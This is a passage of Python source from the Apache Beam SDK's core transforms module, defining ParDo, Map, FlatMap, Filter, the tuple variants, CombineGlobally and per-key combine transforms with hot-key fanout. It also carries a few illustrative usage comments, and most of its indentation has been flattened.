if len(accumulator) > self._buffer_size:
accumulator = [self._fn(accumulator)]
return accumulator
def merge_accumulators(self, accumulators):
return [self._fn(_ReiterableChain(accumulators))]
def compact(self, accumulator):
if len(accumulator) <= 1:
return accumulator
else:
return [self._fn(accumulator)]
def extract_output(self, accumulator):
return self._fn(accumulator)
class PartitionFn(WithTypeHints):
"""A function object used by a Partition transform.
A PartitionFn specifies how individual values in a PCollection will be placed
into separate partitions, indexed by an integer.
"""
def default_label(self):
return self.__class__.__name__
def partition_for(self, element, num_partitions, *args, **kwargs):
# type: (T, int, *typing.Any, **typing.Any) -> int
"""Specify which partition will receive this element.
Args:
element: An element of the input PCollection.
num_partitions: Number of partitions, i.e., output PCollections.
*args: optional parameters and side inputs.
**kwargs: optional parameters and side inputs.
Returns:
An integer in [0, num_partitions).
"""
pass
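# Illustrative sketch (not part of the upstream module): a PartitionFn that
# spreads elements across partitions by hashing an assumed ``key`` attribute.
class _ExampleHashPartitionFn(PartitionFn):
  def partition_for(self, element, num_partitions, *args, **kwargs):
    # ``element.key`` is a hypothetical field used only for illustration.
    return hash(element.key) % num_partitions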
class CallableWrapperPartitionFn(PartitionFn):
"""For internal use only; no backwards-compatibility guarantees.
A PartitionFn object wrapping a callable object.
Instances of this class wrap simple functions for use in Partition operations.
"""
def __init__(self, fn):
"""Initializes a PartitionFn object wrapping a callable.
Args:
fn: A callable object, which should accept the following arguments:
element - element to assign to a partition.
num_partitions - number of output partitions.
and may accept additional arguments and side inputs.
Raises:
TypeError: if fn is not a callable type.
"""
if not callable(fn):
raise TypeError('Expected a callable object instead of: %r' % fn)
self._fn = fn
def partition_for(self, element, num_partitions, *args, **kwargs):
# type: (T, int, *typing.Any, **typing.Any) -> int
return self._fn(element, num_partitions, *args, **kwargs)
class ParDo(PTransformWithSideInputs):
"""A :class:`ParDo` transform.
Processes an input :class:`~apache_beam.pvalue.PCollection` by applying a
:class:`DoFn` to each element and returning the accumulated results into an
output :class:`~apache_beam.pvalue.PCollection`. The type of the elements is
not fixed as long as the :class:`DoFn` can deal with it. In reality the type
is restrained to some extent because the elements sometimes must be persisted
to external storage. See the :meth:`.expand()` method comments for a
detailed description of all possible arguments.
Note that the :class:`DoFn` must return an iterable for each element of the
input :class:`~apache_beam.pvalue.PCollection`. An easy way to do this is to
use the ``yield`` keyword in the process method.
Args:
pcoll (~apache_beam.pvalue.PCollection):
a :class:`~apache_beam.pvalue.PCollection` to be processed.
fn (`typing.Union[DoFn, typing.Callable]`): a :class:`DoFn` object to be
applied to each element of **pcoll** argument, or a Callable.
*args: positional arguments passed to the :class:`DoFn` object.
**kwargs: keyword arguments passed to the :class:`DoFn` object.
Note that the positional and keyword arguments will be processed in order
to detect :class:`~apache_beam.pvalue.PCollection` s that will be computed as
side inputs to the transform. During pipeline execution whenever the
:class:`DoFn` object gets executed (its :meth:`DoFn.process()` method gets
called) the :class:`~apache_beam.pvalue.PCollection` arguments will be
replaced by values from the :class:`~apache_beam.pvalue.PCollection` in the
exact positions where they appear in the argument lists.
"""
def __init__(self, fn, *args, **kwargs):
super(ParDo, self).__init__(fn, *args, **kwargs)
# TODO(robertwb): Change all uses of the dofn attribute to use fn instead.
self.dofn = self.fn
self.output_tags = set() # type: typing.Set[str]
if not isinstance(self.fn, DoFn):
raise TypeError('ParDo must be called with a DoFn instance.')
# Validate the DoFn by creating a DoFnSignature
from apache_beam.runners.common import DoFnSignature
self._signature = DoFnSignature(self.fn)
def default_type_hints(self):
return self.fn.get_type_hints()
def infer_output_type(self, input_type):
return trivial_inference.element_type(self.fn.infer_output_type(input_type))
def make_fn(self, fn, has_side_inputs):
if isinstance(fn, DoFn):
return fn
return CallableWrapperDoFn(fn)
def _process_argspec_fn(self):
return self.fn._process_argspec_fn()
def display_data(self):
return {
'fn': DisplayDataItem(self.fn.__class__, label='Transform Function'),
'fn_dd': self.fn
}
def expand(self, pcoll):
# In the case of a stateful DoFn, warn if the key coder is not
# deterministic.
if self._signature.is_stateful_dofn():
kv_type_hint = pcoll.element_type
if kv_type_hint and kv_type_hint != typehints.Any:
coder = coders.registry.get_coder(kv_type_hint)
if not coder.is_kv_coder():
raise ValueError(
'Input elements to the transform %s with stateful DoFn must be '
'key-value pairs.' % self)
key_coder = coder.key_coder()
else:
key_coder = coders.registry.get_coder(typehints.Any)
if not key_coder.is_deterministic():
_LOGGER.warning(
'Key coder %s for transform %s with stateful DoFn may not '
'be deterministic. This may cause incorrect behavior for complex '
'key types. Consider adding an input type hint for this transform.',
key_coder,
self)
return pvalue.PCollection.from_(pcoll)
def with_outputs(self, *tags, **main_kw):
"""Returns a tagged tuple allowing access to the outputs of a
:class:`ParDo`.
The resulting object supports access to the
:class:`~apache_beam.pvalue.PCollection` associated with a tag
(e.g. ``o.tag``, ``o[tag]``) and iterating over the available tags
(e.g. ``for tag in o: ...``).
Args:
*tags: if non-empty, list of valid tags. If a list of valid tags is given,
it will be an error to use an undeclared tag later in the pipeline.
**main_kw: dictionary empty or with one key ``'main'`` defining the tag to
be used for the main output (which will not have a tag associated with
it).
Returns:
~apache_beam.pvalue.DoOutputsTuple: An object of type
:class:`~apache_beam.pvalue.DoOutputsTuple` that bundles together all
the outputs of a :class:`ParDo` transform and allows accessing the
individual :class:`~apache_beam.pvalue.PCollection` s for each output
using an ``object.tag`` syntax.
Raises:
TypeError: if the **self** object is not a
:class:`~apache_beam.pvalue.PCollection` that is the result of a
:class:`ParDo` transform.
ValueError: if **main_kw** contains any key other than
``'main'``.
"""
main_tag = main_kw.pop('main', None)
if main_kw:
raise ValueError('Unexpected keyword arguments: %s' % list(main_kw))
return _MultiParDo(self, tags, main_tag)
def _pardo_fn_data(self):
si_tags_and_types = None
windowing = None
return self.fn, self.args, self.kwargs, si_tags_and_types, windowing
def to_runner_api_parameter(self, context):
# type: (PipelineContext) -> typing.Tuple[str, message.Message]
assert isinstance(self, ParDo), \
"expected instance of ParDo, but got %s" % self.__class__
picked_pardo_fn_data = pickler.dumps(self._pardo_fn_data())
state_specs, timer_specs = userstate.get_dofn_specs(self.fn)
if state_specs or timer_specs:
context.add_requirement(
common_urns.requirements.REQUIRES_STATEFUL_PROCESSING.urn)
from apache_beam.runners.common import DoFnSignature
sig = DoFnSignature(self.fn)
is_splittable = sig.is_splittable_dofn()
if is_splittable:
restriction_coder = sig.get_restriction_coder()
restriction_coder_id = context.coders.get_id(
restriction_coder) # type: typing.Optional[str]
else:
restriction_coder_id = None
has_bundle_finalization = sig.has_bundle_finalization()
if has_bundle_finalization:
context.add_requirement(
common_urns.requirements.REQUIRES_BUNDLE_FINALIZATION.urn)
return (
common_urns.primitives.PAR_DO.urn,
beam_runner_api_pb2.ParDoPayload(
do_fn=beam_runner_api_pb2.FunctionSpec(
urn=python_urns.PICKLED_DOFN_INFO,
payload=picked_pardo_fn_data),
splittable=is_splittable,
requests_finalization=has_bundle_finalization,
restriction_coder_id=restriction_coder_id,
state_specs={
spec.name: spec.to_runner_api(context)
for spec in state_specs
},
timer_specs={
spec.name: spec.to_runner_api(context)
for spec in timer_specs
},
# It'd be nice to name these according to their actual
# names/positions in the original argument list, but such a
# transformation is currently irreversible given how
# remove_objects_from_args and insert_values_in_args
# are currently implemented.
side_inputs={
"side%s" % ix: si.to_runner_api(context)
for ix,
si in enumerate(self.side_inputs)
}))
@staticmethod
@PTransform.register_urn(
common_urns.primitives.PAR_DO.urn, beam_runner_api_pb2.ParDoPayload)
def from_runner_api_parameter(pardo_payload, context):
assert pardo_payload.do_fn.urn == python_urns.PICKLED_DOFN_INFO
fn, args, kwargs, si_tags_and_types, windowing = pickler.loads(
pardo_payload.do_fn.payload)
if si_tags_and_types:
raise NotImplementedError('explicit side input data')
elif windowing:
raise NotImplementedError('explicit windowing')
result = ParDo(fn, *args, **kwargs)
# This is an ordered list stored as a dict (see the comments in
# to_runner_api_parameter above).
indexed_side_inputs = [(
get_sideinput_index(tag),
pvalue.AsSideInput.from_runner_api(si, context)) for tag,
si in pardo_payload.side_inputs.items()]
result.side_inputs = [si for _, si in sorted(indexed_side_inputs)]
return result
def runner_api_requires_keyed_input(self):
return userstate.is_stateful_dofn(self.fn)
def get_restriction_coder(self):
"""Returns `restriction coder if `DoFn` of this `ParDo` is a SDF.
Returns `None` otherwise.
"""
from apache_beam.runners.common import DoFnSignature
return DoFnSignature(self.fn).get_restriction_coder()
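# Illustrative usage sketch (comments only; a pipeline should not run at import
# time in this module). The ``events`` PCollection, ClassifyDoFn and the tag
# names are hypothetical:
#
#   results = events | beam.ParDo(ClassifyDoFn()).with_outputs(
#       'errors', main='valid')
#   valid, errors = results.valid, results.errors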
class _MultiParDo(PTransform):
def __init__(self, do_transform, tags, main_tag):
super(_MultiParDo, self).__init__(do_transform.label)
self._do_transform = do_transform
self._tags = tags
self._main_tag = main_tag
def expand(self, pcoll):
_ = pcoll | self._do_transform
return pvalue.DoOutputsTuple(
pcoll.pipeline, self._do_transform, self._tags, self._main_tag)
def FlatMap(fn, *args, **kwargs): # pylint: disable=invalid-name
""":func:`FlatMap` is like :class:`ParDo` except it takes a callable to
specify the transformation.
The callable must return an iterable for each element of the input
:class:`~apache_beam.pvalue.PCollection`. The elements of these iterables will
be flattened into the output :class:`~apache_beam.pvalue.PCollection`.
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`FlatMap` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
label = 'FlatMap(%s)' % ptransform.label_from_callable(fn)
if not callable(fn):
raise TypeError(
'FlatMap can be used only with callable objects. '
'Received %r instead.' % (fn))
pardo = ParDo(CallableWrapperDoFn(fn), *args, **kwargs)
pardo.label = label
return pardo
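# Illustrative usage sketch (comments only); the ``lines`` PCollection is
# assumed:
#
#   words = lines | beam.FlatMap(lambda line: line.split())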
def Map(fn, *args, **kwargs): # pylint: disable=invalid-name
""":func:`Map` is like :func:`FlatMap` except its callable returns only a
single element.
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`Map` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'Map can be used only with callable objects. '
'Received %r instead.' % (fn))
if _fn_takes_side_inputs(fn):
wrapper = lambda x, *args, **kwargs: [fn(x, *args, **kwargs)]
else:
wrapper = lambda x: [fn(x)]
label = 'Map(%s)' % ptransform.label_from_callable(fn)
# TODO. What about callable classes?
if hasattr(fn, '__name__'):
wrapper.__name__ = fn.__name__
# Proxy the type-hint information from the original function to this new
# wrapped function.
type_hints = get_type_hints(fn).with_defaults(
typehints.decorators.IOTypeHints.from_callable(fn))
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if output_hint:
wrapper = with_output_types(typehints.Iterable[output_hint])(wrapper)
# pylint: disable=protected-access
wrapper._argspec_fn = fn
# pylint: enable=protected-access
pardo = FlatMap(wrapper, *args, **kwargs)
pardo.label = label
return pardo
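# Illustrative usage sketch (comments only); the ``words`` PCollection is
# assumed. Unlike FlatMap, Map emits exactly one output per input element:
#
#   lengths = words | beam.Map(len)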
def MapTuple(fn, *args, **kwargs): # pylint: disable=invalid-name
r""":func:`MapTuple` is like :func:`Map` but expects tuple inputs and
flattens them into multiple input arguments.
beam.MapTuple(lambda a, b, ...: ...)
is equivalent to Python 2
beam.Map(lambda (a, b, ...), ...: ...)
In other words
beam.MapTuple(fn)
is equivalent to
beam.Map(lambda element, ...: fn(\*element, ...))
This can be useful when processing a PCollection of tuples
(e.g. key-value pairs).
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`MapTuple` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'MapTuple can be used only with callable objects. '
'Received %r instead.' % (fn))
label = 'MapTuple(%s)' % ptransform.label_from_callable(fn)
arg_names, defaults = get_function_args_defaults(fn)
num_defaults = len(defaults)
if num_defaults < len(args) + len(kwargs):
raise TypeError('Side inputs must have defaults for MapTuple.')
if defaults or args or kwargs:
wrapper = lambda x, *args, **kwargs: [fn(*(tuple(x) + args), **kwargs)]
else:
wrapper = lambda x: [fn(*x)]
# Proxy the type-hint information from the original function to this new
# wrapped function.
type_hints = get_type_hints(fn)
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if output_hint:
wrapper = with_output_types(typehints.Iterable[output_hint])(wrapper)
# Replace the first (args) component.
modified_arg_names = ['tuple_element'] + arg_names[-num_defaults:]
modified_argspec = (modified_arg_names, defaults)
pardo = ParDo(
CallableWrapperDoFn(wrapper, fullargspec=modified_argspec),
*args,
**kwargs)
pardo.label = label
return pardo
def FlatMapTuple(fn, *args, **kwargs): # pylint: disable=invalid-name
r""":func:`FlatMapTuple` is like :func:`FlatMap` but expects tuple inputs and
flattens them into multiple input arguments.
beam.FlatMapTuple(lambda a, b, ...: ...)
is equivalent to Python 2
beam.FlatMap(lambda (a, b, ...), ...: ...)
In other words
beam.FlatMapTuple(fn)
is equivalent to
beam.FlatMap(lambda element, ...: fn(\*element, ...))
This can be useful when processing a PCollection of tuples
(e.g. key-value pairs).
Args:
fn (callable): a callable object.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`FlatMapTuple` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'FlatMapTuple can be used only with callable objects. '
'Received %r instead.' % (fn))
label = 'FlatMapTuple(%s)' % ptransform.label_from_callable(fn)
arg_names, defaults = get_function_args_defaults(fn)
num_defaults = len(defaults)
if num_defaults < len(args) + len(kwargs):
raise TypeError('Side inputs must have defaults for FlatMapTuple.')
if defaults or args or kwargs:
wrapper = lambda x, *args, **kwargs: fn(*(tuple(x) + args), **kwargs)
else:
wrapper = lambda x: fn(*x)
# Proxy the type-hint information from the original function to this new
# wrapped function.
type_hints = get_type_hints(fn)
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if output_hint:
wrapper = with_output_types(output_hint)(wrapper)
# Replace the first (args) component.
modified_arg_names = ['tuple_element'] + arg_names[-num_defaults:]
modified_argspec = (modified_arg_names, defaults)
pardo = ParDo(
CallableWrapperDoFn(wrapper, fullargspec=modified_argspec),
*args,
**kwargs)
pardo.label = label
return pardo
def Filter(fn, *args, **kwargs): # pylint: disable=invalid-name
""":func:`Filter` is a :func:`FlatMap` with its callable filtering out
elements.
Args:
fn (``Callable[..., bool]``): a callable object. First argument will be an
element.
*args: positional arguments passed to the transform callable.
**kwargs: keyword arguments passed to the transform callable.
Returns:
~apache_beam.pvalue.PCollection:
A :class:`~apache_beam.pvalue.PCollection` containing the
:func:`Filter` outputs.
Raises:
TypeError: If the **fn** passed as argument is not a callable.
Typical error is to pass a :class:`DoFn` instance which is supported only
for :class:`ParDo`.
"""
if not callable(fn):
raise TypeError(
'Filter can be used only with callable objects. '
'Received %r instead.' % (fn))
wrapper = lambda x, *args, **kwargs: [x] if fn(x, *args, **kwargs) else []
label = 'Filter(%s)' % ptransform.label_from_callable(fn)
# TODO: What about callable classes?
if hasattr(fn, '__name__'):
wrapper.__name__ = fn.__name__
# Get type hints from this instance or the callable. Do not use output type
# hints from the callable (which should be bool if set).
fn_type_hints = typehints.decorators.IOTypeHints.from_callable(fn)
if fn_type_hints is not None:
fn_type_hints = fn_type_hints.with_output_types()
type_hints = get_type_hints(fn).with_defaults(fn_type_hints)
# Proxy the type-hint information from the function being wrapped, setting the
# output type to be the same as the input type.
if type_hints.input_types is not None:
wrapper = with_input_types(
*type_hints.input_types[0], **type_hints.input_types[1])(
wrapper)
output_hint = type_hints.simple_output_type(label)
if (output_hint is None and get_type_hints(wrapper).input_types and
get_type_hints(wrapper).input_types[0]):
output_hint = get_type_hints(wrapper).input_types[0][0]
if output_hint:
wrapper = with_output_types(typehints.Iterable[output_hint])(wrapper)
# pylint: disable=protected-access
wrapper._argspec_fn = fn
# pylint: enable=protected-access
pardo = FlatMap(wrapper, *args, **kwargs)
pardo.label = label
return pardo
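# Illustrative usage sketch (comments only); the ``numbers`` PCollection is
# assumed. Elements for which the callable returns a falsy value are dropped:
#
#   evens = numbers | beam.Filter(lambda n: n % 2 == 0)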
def _combine_payload(combine_fn, context):
return beam_runner_api_pb2.CombinePayload(
combine_fn=combine_fn.to_runner_api(context),
accumulator_coder_id=context.coders.get_id(
combine_fn.get_accumulator_coder()))
class CombineGlobally(PTransform):
"""A :class:`CombineGlobally` transform.
Reduces a :class:`~apache_beam.pvalue.PCollection` to a single value by
progressively applying a :class:`CombineFn` to portions of the
:class:`~apache_beam.pvalue.PCollection` (and to intermediate values created
thereby). See documentation in :class:`CombineFn` for details on the specifics
on how :class:`CombineFn` s are applied.
Args:
pcoll (~apache_beam.pvalue.PCollection):
a :class:`~apache_beam.pvalue.PCollection` to be reduced into a single
value.
fn (callable): a :class:`CombineFn` object that will be called to
progressively reduce the :class:`~apache_beam.pvalue.PCollection` into
single values, or a callable suitable for wrapping by
:class:`~apache_beam.transforms.core.CallableWrapperCombineFn`.
*args: positional arguments passed to the :class:`CombineFn` object.
**kwargs: keyword arguments passed to the :class:`CombineFn` object.
Raises:
TypeError: If the output type of the input
:class:`~apache_beam.pvalue.PCollection` is not compatible
with ``Iterable[A]``.
Returns:
~apache_beam.pvalue.PCollection: A single-element
:class:`~apache_beam.pvalue.PCollection` containing the main output of
the :class:`CombineGlobally` transform.
Note that the positional and keyword arguments will be processed in order
to detect :class:`~apache_beam.pvalue.PValue` s that will be computed as side
inputs to the transform.
During pipeline execution whenever the :class:`CombineFn` object gets executed
(i.e. any of the :class:`CombineFn` methods get called), the
:class:`~apache_beam.pvalue.PValue` arguments will be replaced by their
actual value in the exact position where they appear in the argument lists.
"""
has_defaults = True
as_view = False
fanout = None
def __init__(self, fn, *args, **kwargs):
if not (isinstance(fn, CombineFn) or callable(fn)):
raise TypeError(
'CombineGlobally can be used only with combineFn objects. '
'Received %r instead.' % (fn))
super(CombineGlobally, self).__init__()
self.fn = fn
self.args = args
self.kwargs = kwargs
def display_data(self):
return {
'combine_fn': DisplayDataItem(
self.fn.__class__, label='Combine Function'),
'combine_fn_dd': self.fn,
}
def default_label(self):
if self.fanout is None:
return '%s(%s)' % (
self.__class__.__name__, ptransform.label_from_callable(self.fn))
else:
return '%s(%s, fanout=%s)' % (
self.__class__.__name__,
ptransform.label_from_callable(self.fn),
self.fanout)
def _clone(self, **extra_attributes):
clone = copy.copy(self)
clone.__dict__.update(extra_attributes)
return clone
def with_fanout(self, fanout):
return self._clone(fanout=fanout)
def with_defaults(self, has_defaults=True):
return self._clone(has_defaults=has_defaults)
def without_defaults(self):
return self.with_defaults(False)
def as_singleton_view(self):
return self._clone(as_view=True)
def expand(self, pcoll):
def add_input_types(transform):
type_hints = self.get_type_hints()
if type_hints.input_types:
return transform.with_input_types(type_hints.input_types[0][0])
return transform
combine_per_key = CombinePerKey(self.fn, *self.args, **self.kwargs)
if self.fanout:
combine_per_key = combine_per_key.with_hot_key_fanout(self.fanout)
combined = (
pcoll
| 'KeyWithVoid' >> add_input_types(
Map(lambda v: (None, v)).with_output_types(
typehints.KV[None, pcoll.element_type]))
| 'CombinePerKey' >> combine_per_key
| 'UnKey' >> Map(lambda k_v: k_v[1]))
if not self.has_defaults and not self.as_view:
return combined
if self.has_defaults:
combine_fn = (
self.fn if isinstance(self.fn, CombineFn) else
CombineFn.from_callable(self.fn))
default_value = combine_fn.apply([], *self.args, **self.kwargs)
else:
default_value = pvalue.AsSingleton._NO_DEFAULT # pylint: disable=protected-access
view = pvalue.AsSingleton(combined, default_value=default_value)
if self.as_view:
return view
else:
if pcoll.windowing.windowfn != GlobalWindows():
raise ValueError(
"Default values are not yet supported in CombineGlobally() if the "
"output PCollection is not windowed by GlobalWindows. "
"Instead, use CombineGlobally().without_defaults() to output "
"an empty PCollection if the input PCollection is empty, "
"or CombineGlobally().as_singleton_view() to get the default "
"output of the CombineFn if the input PCollection is empty.")
def typed(transform):
# TODO(robertwb): We should infer this.
if combined.element_type:
return transform.with_output_types(combined.element_type)
return transform
return (
pcoll.pipeline
| 'DoOnce' >> Create([None])
| 'InjectDefault' >> typed(Map(lambda _, s: s, view)))
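# Illustrative usage sketch (comments only); the ``numbers`` PCollection is
# assumed:
#
#   total = numbers | beam.CombineGlobally(sum)
#   # For non-globally-windowed inputs, skip the default value instead:
#   total = numbers | beam.CombineGlobally(sum).without_defaults()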
class CombinePerKey(PTransformWithSideInputs):
"""A per-key Combine transform.
Identifies sets of values associated with the same key in the input
PCollection, then applies a CombineFn to condense those sets to single
values. See documentation in CombineFn for details on the specifics on how
CombineFns are applied.
Args:
pcoll: input pcollection.
fn: instance of CombineFn to apply to all values under the same key in
pcoll, or a callable whose signature is ``f(iterable, *args, **kwargs)``
(e.g., sum, max).
*args: arguments and side inputs, passed directly to the CombineFn.
**kwargs: arguments and side inputs, passed directly to the CombineFn.
Returns:
    A PCollection holding the result of the combine operation.
"""
def with_hot_key_fanout(self, fanout):
"""A per-key combine operation like self but with two levels of aggregation.
If a given key is produced by too many upstream bundles, the final
reduction can become a bottleneck despite partial combining being lifted
pre-GroupByKey. In these cases it can be helpful to perform intermediate
    partial aggregations in parallel and then re-group to perform a final
(per-key) combine. This is also useful for high-volume keys in streaming
where combiners are not generally lifted for latency reasons.
Note that a fanout greater than 1 requires the data to be sent through
two GroupByKeys, and a high fanout can also result in more shuffle data
due to less per-bundle combining. Setting the fanout for a key at 1 or less
places values on the "cold key" path that skip the intermediate level of
aggregation.
Args:
fanout: either None, for no fanout, an int, for a constant-degree fanout,
or a callable mapping keys to a key-specific degree of fanout.
Returns:
A per-key combining PTransform with the specified fanout.
"""
from apache_beam.transforms.combiners import curry_combine_fn
if fanout is None:
return self
else:
return _CombinePerKeyWithHotKeyFanout(
curry_combine_fn(self.fn, self.args, self.kwargs), fanout)
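  # Fanout sketch (values are assumptions for illustration): a constant fanout
  # shards every key into 16 intermediate sub-keys, while a callable can target
  # only the keys known to be hot.
  #
  #   beam.CombinePerKey(sum).with_hot_key_fanout(16)
  #   beam.CombinePerKey(sum).with_hot_key_fanout(
  #       lambda key: 100 if key == 'hot_key' else 1)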
def display_data(self):
return {
'combine_fn': DisplayDataItem(
self.fn.__class__, label='Combine Function'),
'combine_fn_dd': self.fn
}
def make_fn(self, fn, has_side_inputs):
self._fn_label = ptransform.label_from_callable(fn)
return CombineFn.maybe_from_callable(fn, has_side_inputs)
def default_label(self):
return '%s(%s)' % (self.__class__.__name__, self._fn_label)
def _process_argspec_fn(self):
return lambda element, *args, **kwargs: None
def expand(self, pcoll):
args, kwargs = util.insert_values_in_args(
self.args, self.kwargs, self.side_inputs)
return pcoll | GroupByKey() | 'Combine' >> CombineValues(
self.fn, *args, **kwargs)
def default_type_hints(self):
hints = self.fn.get_type_hints()
if hints.input_types:
K = typehints.TypeVariable('K')
args, kwargs = hints.input_types
args = (typehints.Tuple[K, args[0]], ) + args[1:]
hints = hints.with_input_types(*args, **kwargs)
else:
K = typehints.Any
if hints.output_types:
main_output_type = hints.simple_output_type('')
hints = hints.with_output_types(typehints.Tuple[K, main_output_type])
return hints
def to_runner_api_parameter(
self,
context # type: PipelineContext
):
# type: (...) -> typing.Tuple[str, beam_runner_api_pb2.CombinePayload]
if self.args or self.kwargs:
from apache_beam.transforms.combiners import curry_combine_fn
combine_fn = curry_combine_fn(self.fn, self.args, self.kwargs)
else:
combine_fn = self.fn
return (
common_urns.composites.COMBINE_PER_KEY.urn,
_combine_payload(combine_fn, context))
@staticmethod
@PTransform.register_urn(
common_urns.composites.COMBINE_PER_KEY.urn,
beam_runner_api_pb2.CombinePayload)
def from_runner_api_parameter(combine_payload, context):
return CombinePerKey(
CombineFn.from_runner_api(combine_payload.combine_fn, context))
def runner_api_requires_keyed_input(self):
return True
# TODO(robertwb): Rename to CombineGroupedValues?
class CombineValues(PTransformWithSideInputs):
def make_fn(self, fn, has_side_inputs):
return CombineFn.maybe_from_callable(fn, has_side_inputs)
def expand(self, pcoll):
args, kwargs = util.insert_values_in_args(
self.args, self.kwargs, self.side_inputs)
input_type = pcoll.element_type
key_type = None
if input_type is not None:
key_type, _ = input_type.tuple_types
runtime_type_check = (
pcoll.pipeline._options.view_as(TypeOptions).runtime_type_check)
return pcoll | ParDo(
CombineValuesDoFn(key_type, self.fn, runtime_type_check),
*args,
**kwargs)
def to_runner_api_parameter(self, context):
if self.args or self.kwargs:
from apache_beam.transforms.combiners import curry_combine_fn
combine_fn = curry_combine_fn(self.fn, self.args, self.kwargs)
else:
combine_fn = self.fn
return (
common_urns.combine_components.COMBINE_GROUPED_VALUES.urn,
_combine_payload(combine_fn, context))
@staticmethod
@PTransform.register_urn(
common_urns.combine_components.COMBINE_GROUPED_VALUES.urn,
beam_runner_api_pb2.CombinePayload)
def from_runner_api_parameter(combine_payload, context):
return CombineValues(
CombineFn.from_runner_api(combine_payload.combine_fn, context))
class CombineValuesDoFn(DoFn):
"""DoFn for performing per-key Combine transforms."""
def __init__(self,
input_pcoll_type,
combinefn, # type: CombineFn
runtime_type_check, # type: bool
):
super(CombineValuesDoFn, self).__init__()
self.combinefn = combinefn
self.runtime_type_check = runtime_type_check
def process(self, element, *args, **kwargs):
# Expected elements input to this DoFn are 2-tuples of the form
# (key, iter), with iter an iterable of all the values associated with key
# in the input PCollection.
if self.runtime_type_check:
# Apply the combiner in a single operation rather than artificially
# breaking it up so that output type violations manifest as TypeCheck
# errors rather than type errors.
return [(element[0], self.combinefn.apply(element[1], *args, **kwargs))]
# Add the elements into three accumulators (for testing of merge).
elements = list(element[1])
accumulators = []
for k in range(3):
if len(elements) <= k:
break
accumulators.append(
self.combinefn.add_inputs(
self.combinefn.create_accumulator(*args, **kwargs),
elements[k::3],
*args,
**kwargs))
# Merge the accumulators.
accumulator = self.combinefn.merge_accumulators(
accumulators, *args, **kwargs)
# Convert accumulator to the final result.
return [(
element[0], self.combinefn.extract_output(accumulator, *args,
**kwargs))]
def default_type_hints(self):
hints = self.combinefn.get_type_hints()
if hints.input_types:
K = typehints.TypeVariable('K')
args, kwargs = hints.input_types
args = (typehints.Tuple[K, typehints.Iterable[args[0]]], ) + args[1:]
hints = hints.with_input_types(*args, **kwargs)
else:
K = typehints.Any
if hints.output_types:
main_output_type = hints.simple_output_type('')
hints = hints.with_output_types(typehints.Tuple[K, main_output_type])
return hints
class _CombinePerKeyWithHotKeyFanout(PTransform):
def __init__(self,
combine_fn, # type: CombineFn
fanout, # type: typing.Union[int, typing.Callable[[typing.Any], int]]
):
# type: (...) -> None
self._combine_fn = combine_fn
self._fanout_fn = ((lambda key: fanout)
if isinstance(fanout, int) else fanout)
def default_label(self):
return '%s(%s, fanout=%s)' % (
self.__class__.__name__,
ptransform.label_from_callable(self._combine_fn),
ptransform.label_from_callable(self._fanout_fn))
def expand(self, pcoll):
from apache_beam.transforms.trigger import AccumulationMode
combine_fn = self._combine_fn
fanout_fn = self._fanout_fn
class SplitHotCold(DoFn):
def start_bundle(self):
# Spreading a hot key across all possible sub-keys for all bundles
# would defeat the goal of not overwhelming downstream reducers
# (as well as making less efficient use of PGBK combining tables).
        # Instead, each bundle independently makes a consistent choice about
        # which "shard" of a key to send its intermediate results to.
self._nonce = int(random.getrandbits(31))
def process(self, element):
key, value = element
fanout = fanout_fn(key)
if fanout <= 1:
# Boolean indicates this is not an accumulator.
yield (key, (False, value)) # cold
else:
yield pvalue.TaggedOutput('hot', ((self._nonce % fanout, key), value))
class PreCombineFn(CombineFn):
@staticmethod
def extract_output(accumulator):
# Boolean indicates this is an accumulator.
return (True, accumulator)
create_accumulator = combine_fn.create_accumulator
add_input = combine_fn.add_input
merge_accumulators = combine_fn.merge_accumulators
compact = combine_fn.compact
class PostCombineFn(CombineFn):
@staticmethod
def add_input(accumulator, element):
is_accumulator, value = element
if is_accumulator:
return combine_fn.merge_accumulators([accumulator, value])
else:
return combine_fn.add_input(accumulator, value)
create_accumulator = combine_fn.create_accumulator
merge_accumulators = combine_fn.merge_accumulators
compact = combine_fn.compact
extract_output = combine_fn.extract_output
def StripNonce(nonce_key_value):
(_, key), value = nonce_key_value
return key, value
cold, hot = pcoll | ParDo(SplitHotCold()).with_outputs('hot', main='cold')
cold.element_type = typehints.Any # No multi-output type hints.
precombined_hot = (
hot
# Avoid double counting that may happen with stacked accumulating mode.
| 'WindowIntoDiscarding' >> WindowInto(
pcoll.windowing, accumulation_mode=AccumulationMode.DISCARDING)
| CombinePerKey(PreCombineFn())
| Map(StripNonce)
| 'WindowIntoOriginal' >> WindowInto(pcoll.windowing))
return ((cold, precombined_hot)
| Flatten()
| CombinePerKey(PostCombineFn()))
